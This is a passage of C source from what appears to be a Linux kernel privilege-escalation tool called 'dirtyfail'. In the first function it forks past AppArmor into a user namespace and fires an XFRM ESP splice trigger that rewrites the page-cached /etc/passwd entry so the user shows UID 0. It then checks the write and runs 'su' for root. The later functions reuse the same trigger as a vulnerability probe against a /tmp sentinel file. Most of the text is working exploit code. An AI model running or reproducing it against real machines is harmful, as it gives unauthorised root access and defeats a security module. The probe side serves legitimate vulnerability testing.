    log_warn("on success the page cache will report '%s' as UID 0", user);
    log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`");
    if (!typed_confirm("DIRTYFAIL")) {
        log_bad("confirmation declined — aborting");
        return DF_OK;
    }
    if (!ssh_lockout_check(user)) {
        log_bad("SSH-lockout confirmation declined — aborting");
        return DF_OK;
    }

    /* Hand off to the inner via env vars + AA bypass fork.
     *
     * The child fork enters the bypass userns, runs
     * dirtyfrag_esp_exploit_inner (dispatched from main() based on
     * DIRTYFAIL_INNER_MODE), modifies the global page cache, exits.
     * We (parent, init ns) read the result via the same global page
     * cache and execlp(su) here in init ns for REAL root.
     *
     * NOTE(review): these variables are never unset in this function,
     * so they remain in this process's environment (and in that of the
     * exec'd su); dirtyfrag_esp_active_probe() unsets its variables
     * right after the fork returns — confirm whether that is intended
     * here. */
    setenv("DIRTYFAIL_INNER_MODE",   "esp", 1);
    setenv("DIRTYFAIL_TARGET_USER",  user,  1);

    int rc = apparmor_bypass_fork_arm(0, NULL);  /* argc/argv unused for forked variant */
    if (rc != DF_EXPLOIT_OK) {
        log_bad("inner exploit failed (exit=%d)", rc);
        return DF_EXPLOIT_FAIL;
    }

    /* Verify in init namespace — page cache is global, so we see the
     * child's modification here. The three silent failure returns below
     * (open logs; lseek/read do not) all map to DF_EXPLOIT_FAIL. */
    int v = open("/etc/passwd", O_RDONLY);
    if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
    if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
    char land[5] = {0};   /* 4 bytes read + terminating NUL */
    if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
    close(v);
    if (memcmp(land, MARKER, 4) != 0) {
        log_bad("write did not land — page cache reads '%.4s'", land);
        return DF_EXPLOIT_FAIL;
    }
    log_ok("page cache now reports %s with uid 0", user);

    /* --no-shell: try to undo the modification and report success. */
    if (!do_shell) {
        if (try_revert_passwd_page_cache())
            log_ok("page cache reverted (--no-shell)");
        else
            log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
        return DF_EXPLOIT_OK;
    }

    log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
    execlp("su", "su", user, (char *)NULL);
    /* Only reached when execlp() itself failed. */
    log_bad("execlp: %s", strerror(errno));
    return DF_EXPLOIT_FAIL;
}

/* ---------------------------------------------------------------- *
 * Active probe — used by `--scan --active`.
 *
 * Same userns + XFRM SA + splice-trigger setup as the exploit, but
 * targets a sentinel file in /tmp instead of /etc/passwd. The parent
 * (init ns) reads the sentinel after the child returns and looks for
 * the marker bytes.
 *
 * If the marker landed → kernel STORE is reachable → DF_VULNERABLE.
 * If the page is intact → kernel is patched → DF_OK.
 * If AA blocks the bypass → DF_PRECOND_FAIL.
 * ---------------------------------------------------------------- */

/*
 * Inner stage of the active probe.
 *
 * Reads the sentinel path from DIRTYFAIL_PROBE_SENTINEL, opens and
 * binds a NETLINK_XFRM socket, brings lo up, registers the SA and fires
 * the trigger at offset 0 of the sentinel file.
 *
 * Returns DF_EXPLOIT_OK once the trigger has been fired and
 * DF_TEST_ERROR on any failure (or on a non-Linux build).
 */
df_result_t dirtyfrag_esp_active_probe_inner(void)
{
#ifndef __linux__
    return DF_TEST_ERROR;
#else
    const char *sentinel_path = getenv("DIRTYFAIL_PROBE_SENTINEL");
    if (sentinel_path == NULL || sentinel_path[0] == '\0') {
        log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set");
        return DF_TEST_ERROR;
    }

    int xfrm_sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (xfrm_sock < 0) {
        log_bad("active-probe: netlink xfrm: %s", strerror(errno));
        return DF_TEST_ERROR;
    }

    /* Every later exit goes through `done` so the socket is closed. */
    df_result_t outcome = DF_TEST_ERROR;
    struct sockaddr_nl local = { .nl_family = AF_NETLINK };

    if (bind(xfrm_sock, (struct sockaddr *)&local, sizeof(local)) < 0) {
        log_bad("active-probe: bind netlink: %s", strerror(errno));
        goto done;
    }
    if (!bring_lo_up()) {
        log_bad("active-probe: bring lo up: %s", strerror(errno));
        goto done;
    }
    if (!xfrm_register_sa(xfrm_sock, (const unsigned char *)MARKER))
        goto done;
    if (!trigger_store_at(sentinel_path, 0))
        goto done;

    outcome = DF_EXPLOIT_OK;

done:
    close(xfrm_sock);
    return outcome;
#endif
}

/*
 * Outer stage of the active probe.
 *
 * Creates a 4 KiB sentinel file of 'A' bytes under /tmp, reads it back
 * once, runs the inner probe in a forked child via
 * apparmor_bypass_fork_arm(), then re-reads the first 64 bytes of the
 * sentinel and searches them for MARKER. The sentinel is removed on
 * every path after it has been created.
 *
 * Returns DF_VULNERABLE when the marker is found, DF_OK when it is not,
 * DF_PRECOND_FAIL when the fork helper reports that, and DF_TEST_ERROR
 * for any setup, inner-stage or read failure.
 */
df_result_t dirtyfrag_esp_active_probe(void)
{
    char          sentinel_path[] = "/tmp/dirtyfail-esp-probe.XXXXXX";
    unsigned char page[4096];
    unsigned char head[64];
    df_result_t   verdict = DF_TEST_ERROR;
    ssize_t       n;
    int           fd;

    fd = mkstemp(sentinel_path);
    if (fd < 0) {
        log_bad("probe mkstemp: %s", strerror(errno));
        return DF_TEST_ERROR;
    }

    /* Sentinel contents: one page worth of 'A'. */
    memset(page, 'A', sizeof(page));
    n = write(fd, page, sizeof(page));
    close(fd);
    if (n != (ssize_t)sizeof(page))
        goto discard;

    /* Read the file back once so its page is resident. */
    fd = open(sentinel_path, O_RDONLY);
    if (fd < 0)
        goto discard;
    n = read(fd, page, sizeof(page));
    close(fd);
    if (n != (ssize_t)sizeof(page))
        goto discard;

    /* The env vars only need to exist for the duration of the fork. */
    setenv("DIRTYFAIL_INNER_MODE",      "esp-probe",   1);
    setenv("DIRTYFAIL_PROBE_SENTINEL",  sentinel_path, 1);
    int rc = apparmor_bypass_fork_arm(0, NULL);
    unsetenv("DIRTYFAIL_INNER_MODE");
    unsetenv("DIRTYFAIL_PROBE_SENTINEL");

    if (rc == DF_PRECOND_FAIL) {
        verdict = DF_PRECOND_FAIL;
        goto discard;
    }
    if (rc != DF_EXPLOIT_OK) {
        log_bad("active-probe inner failed (exit=%d)", rc);
        goto discard;
    }

    /* Re-read the start of the sentinel and look for the marker. */
    fd = open(sentinel_path, O_RDONLY);
    if (fd < 0)
        goto discard;
    n = read(fd, head, sizeof(head));
    close(fd);
    unlink(sentinel_path);
    if (n <= 0)
        return DF_TEST_ERROR;

    int pos = 0;
    while (pos + 4 <= n) {
        if (memcmp(head + pos, MARKER, 4) == 0) {
            log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", pos);
            return DF_VULNERABLE;
        }
        pos++;
    }
    log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched");
    return DF_OK;

discard:
    unlink(sentinel_path);
    return verdict;
}